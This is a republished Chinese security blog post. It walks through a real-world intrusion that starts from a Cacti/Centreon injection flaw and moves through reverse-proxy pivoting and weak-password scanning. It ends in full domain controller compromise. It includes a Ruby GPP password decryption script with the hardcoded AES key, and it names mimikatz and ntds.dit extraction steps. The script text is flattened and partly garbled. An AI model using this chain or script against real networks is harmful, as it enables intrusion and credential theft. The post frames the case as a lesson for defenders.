Cacti監控系統注入漏洞引發的內網血案

jopen 9年前發布 | 16K 次閱讀 監控系統

原文  http://www.secpulse.com/archives/4443.html

前言:

安全是個整體,任何一個短板都會造成安全事故,從邊界網絡到IDC 運維網絡再到辦公網絡,都是個整體每一處網絡都不能忽視。

企業在為安全做了多層防護不是一個IDS,WAF,殺毒軟件安全防護能搞定事,為何內網不堪一擊,真有攻擊發生時,這些防護策略能否覺察到攻擊。

Cacti監控系統注入漏洞引發的內網血案

案例:注入到shell再到內網域控

整個事件起因是源自 Cacti 注入漏洞引起, Cacti Centreon企業服務器版本2.2->3.0 存在遠程SQL注入和遠程命令注入漏洞

Cacti監控系統注入漏洞引發的內網血案

提權GETSHELL 發現到挺有意思的是個內網,是個典型內網服務做了端口路由映射公網。看起來安全做的很高大尚。

Cacti監控系統注入漏洞引發的內網血案

網絡拓撲圖:

Cacti監控系統注入漏洞引發的內網血案

通過上圖網絡架構大概搞清楚目標內網環境,在這時候發現Linux版本Centios  6.5 內核較新 ,放棄對內核提權,沒有ROOT 權限, 必需使用一個低權限的工具來執行,并反彈加代理方式把內網環境轉發到公網proxy  使用。

Cacti監控系統注入漏洞引發的內網血案

此時該臺內網機器數據包已經轉發到公網上了,接下來操起 proxy 工具開始吧,雖然是內網環境但其實數據是經過外網轉一圈回到內網,掃描時候并發不能開太大,很容易觸發防火墻規則,并發進程設置為最小,數據包慢慢經過防火墻。

Cacti監控系統注入漏洞引發的內網血案

通過一系列服務掃描  從C 段掃描得到N  WEB 服務弱口令,其中有個私有云服務器,接下進入管理界面。

Cacti監控系統注入漏洞引發的內網血案

對該云系統繼續分析, 其中發現一臺監控服務器中的發郵件腳本存在密碼拿到密碼生成一份字典,又繼續對其它內網網段做各種掃描

Cacti監控系統注入漏洞引發的內網血案

查看下該臺服務器管理員訪問記錄  SSH 登陸的IP  192.168.XX 就是辦公網絡地址

Cacti監控系統注入漏洞引發的內網血案

拿到辦公網一臺加域服務器,并利用WINDOWS 組策略陷獲取系統并提升域管理員權限,ruby 腳本解密出Groups.xml 文件AD 域控管理密碼 ( 小編只能說 運氣真好 而且密碼還竟然TMD的有效?

C:\Users\All Users\Microsoft\Group Policy\History{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml

Cacti監控系統注入漏洞引發的內網血案

安全脈搏SP小編附上ruby版的GPP解密腳本gpp.rb

require 'rubygems'
require 'openssl'
require 'base64'

encrypted_data = "The Password here(SecPulse.com)"

encrypted_data = ARGV

def decrypt(encrypted_data) padding = "=" * (4 - (encrypted_data.length % 4)) epassword = "#{encrypted_data}#{padding}" decoded = Base64.decode64(epassword)

key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b" aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") aes.decrypt aes.key = key plaintext = aes.update(decoded) plaintext << aes.final pass = plaintext.unpack('v').pack('C') # UNICODE conversion

return pass end

blah = decrypt(encrypted_data) puts blah</pre>

登陸到域控服務器,使用mimikatz dump內存中域管理員帳號和密碼,并通過vssown.vbs + libesedb + NtdsXtract 拿到域數據庫ntds.dit 和SYSTEM 文件

Cacti監控系統注入漏洞引發的內網血案

Cacti監控系統注入漏洞引發的內網血案

到這步已經控制內網AD域控服務器包括Exchange MAIL

Cacti監控系統注入漏洞引發的內網血案

Cacti監控系統注入漏洞引發的內網血案

安全思考:

大部份企業安全只做了單維度防護,攻擊者利用0DAY 或因安全意識不足造成攻擊,通過該攻擊進入到企業內部網絡,但許多檢測系統目前為止還是依靠特征來發現,因此對一些未知的攻擊手段必需要有行為去判斷,并 且要更多層次的維度來進行,把每個漏洞和黑客攻擊手法制定策略并建立起來。

“魔高道高,道高魔高”網絡攻防是兩者長期博弈“戰場”,現如今的安全發展,被動防護同時也要走向“主動防御“思路。

【本文來源: Cacti 監控系統注入漏洞引發的血案 SP小編編輯發布】

</article> </div>

 本文由用戶 jopen 自行上傳分享,僅供網友學習交流。所有權歸原作者,若您的權利被侵害,請聯系管理員。
 轉載本站原創文章,請注明出處,并保留原始鏈接、圖片水印。
 本站是一個以用戶分享為主的開源技術平臺,歡迎各類分享!